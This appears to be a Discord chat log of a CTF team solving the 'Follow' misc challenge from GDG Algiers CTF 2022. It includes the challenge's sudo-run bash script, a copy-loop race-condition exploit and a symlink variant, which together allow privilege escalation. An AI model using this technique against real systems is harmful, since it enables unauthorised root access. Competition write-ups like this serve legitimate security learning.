Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-misc-follow
Follow - 500 points
Category: Misc
Description:
> I'm new to linux and wanted to learn some bash.
> This is what I have made so far.

Password: ctf
Author: ouxs
Files: No files.
Tags: linux
Sutx pinned a message to this channel. 10/08/2022 11:00 AM
@crazyman ai wants to collaborate 🤝
```
ctf@564f8adf2fc2:/$ sudo cat flag.txt

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for ctf:
```
11:49
```
ctf@564f8adf2fc2:/challenge$ cat script.sh
#!/bin/bash

set -euxo pipefail

CTF_DIR="/home/ctf"
CHALLENGE_DIR="/challenge"
PROG="testing-sudo"
CTF_USER="ctf"
CTF_CRACKED_USER="ctf-cracked"
SUM="116c9f232ee81305478c093ad774d72c"

check () {
    file="${1}"
    if [ -e "${CTF_DIR}/${file}" ] && ! [ -f "${CTF_DIR}/${file}" ]; then
        rm -rf "${CTF_DIR}/${file}"
    fi
    if ! [ -e "${CTF_DIR}/${file}" ]; then
        touch "${CTF_DIR}/${file}"
    fi
    if ! [ "$SUM" == $( md5sum "${CTF_DIR}/${file}" | awk '{print $1}') ]; then
        cp "${CHALLENGE_DIR}/${file}" "${CTF_DIR}/${file}"
    fi
    chown "${CTF_CRACKED_USER}:${CTF_CRACKED_USER}" "${CTF_DIR}/${file}"
    chmod 4644 "${CTF_DIR}/${file}"
}

reset(){
    file="${1}"
    chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}"
    chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}/${file}"
    chmod 744 "${CTF_DIR}/${file}"
}

chown "root:root" "${CTF_DIR}"
chmod 755 "${CTF_DIR}"
check "$PROG"
chmod +x "${CTF_DIR}/${PROG}"
sudo -u "${CTF_CRACKED_USER}" "${CTF_DIR}/${PROG}"
reset "$PROG"
```
11:49
```
ctf@564f8adf2fc2:/challenge$ cat testing-sudo.c
#include <stdio.h>
#include <unistd.h>

int main(int argc, char const *argv[])
{
    if ((getuid()==1000) && (geteuid() == 1000)){
        printf("Executing a program with cracked user\n");
    }else{
        printf("Executing a program with ctf user\n");
    }
    return 0;
}
```
@irogir wants to collaborate 🤝
oh wait @irogir so it's not related to the reset race condition you mentioned?
@22sh wants to collaborate 🤝
nope that was complete nonsense, there is a race condition but not exploitable (edited)
crazyman ai 10/08/2022 4:54 PM
have no idea of it
16:54
Possibly a race condition?
@irogir i got confirmed its race condition tho
@Violin wants to collaborate 🤝
@Zafirr wants to collaborate 🤝
> sahuang: @irogir i got confirmed its race condition tho
race condition on script.sh
@Guesslemonger wants to collaborate 🤝
> sahuang: race condition on script.sh
but we cant even run script.sh...
you can run script.sh as root
try sudo -l
21:21
check what you can run as another user
```
ctf@4258882da3d5:~$ sudo -l
Matching Defaults entries for ctf on 4258882da3d5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ctf may run the following commands on 4258882da3d5:
    (root : root) NOPASSWD: /challenge/script.sh
```
21:28
run it without password for root user
21:29
```
ctf@4258882da3d5:~$ sudo /challenge/script.sh
+ CTF_DIR=/home/ctf
+ CHALLENGE_DIR=/challenge
+ PROG=testing-sudo
+ CTF_USER=ctf
+ CTF_CRACKED_USER=ctf-cracked
+ SUM=116c9f232ee81305478c093ad774d72c
+ chown root:root /home/ctf
+ chmod 755 /home/ctf
+ check testing-sudo
+ file=testing-sudo
+ '[' -e /home/ctf/testing-sudo ']'
+ '[' -f /home/ctf/testing-sudo ']'
+ '[' -e /home/ctf/testing-sudo ']'
++ md5sum /home/ctf/testing-sudo
++ awk '{print $1}'
+ '[' 116c9f232ee81305478c093ad774d72c == 53a9dab16370bfd0a5ae4be949e9b444 ']'
+ cp /challenge/testing-sudo /home/ctf/testing-sudo
+ chown ctf-cracked:ctf-cracked /home/ctf/testing-sudo
+ chmod 4644 /home/ctf/testing-sudo
+ chmod +x /home/ctf/testing-sudo
+ sudo -u ctf-cracked /home/ctf/testing-sudo
Executing a program with cracked user
+ reset testing-sudo
+ file=testing-sudo
+ chown ctf:ctf /home/ctf
+ chown ctf:ctf /home/ctf/testing-sudo
+ chmod 744 /home/ctf/testing-sudo
```
gives some weird stuff after running this
```
ctf@4258882da3d5:~$ ./a
Executing a program with ctf user
ctf@4258882da3d5:~$ ls
a repeat.sh testing-sudo
ctf@4258882da3d5:~$ ./repeat.sh
ctf@4258882da3d5:~$ cat repeat.sh
#!/bin/bash
while true; do cp a testing-sudo; done
```
lmao thats me
21:33
im trying stuff
lmfao
21:33
ok
CyberErudites{Th4t__SYYYM_JU$T_RU11n3d_MA_D44aaY}
Zafirr
used /ctf solve
✅ Challenge solved.
21:37
how
crazyman ai 10/08/2022 9:37 PM
wtf? how?
how did u trigger the race?
i created a.sh that ran chmod 777 on flag.txt
21:37
and ran repeat.sh to cp it to testing-sudo (edited)
wowo
> Zafirr: and ran repeat.sh to cp it to testing-sudo (edited)
gg, but isnt chown "root:root" "${CTF_DIR}" preventing you from doing that?
03:29
nvm, its not recursive like it was in the other challenges
03:31
i guess one could also symlink the file to flag.txt and abuse the race condition between
```
chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}/${file}"
chmod 744 "${CTF_DIR}/${file}"
```
to read the flag
i think thats the intended way based on the flag
Yeah « follow »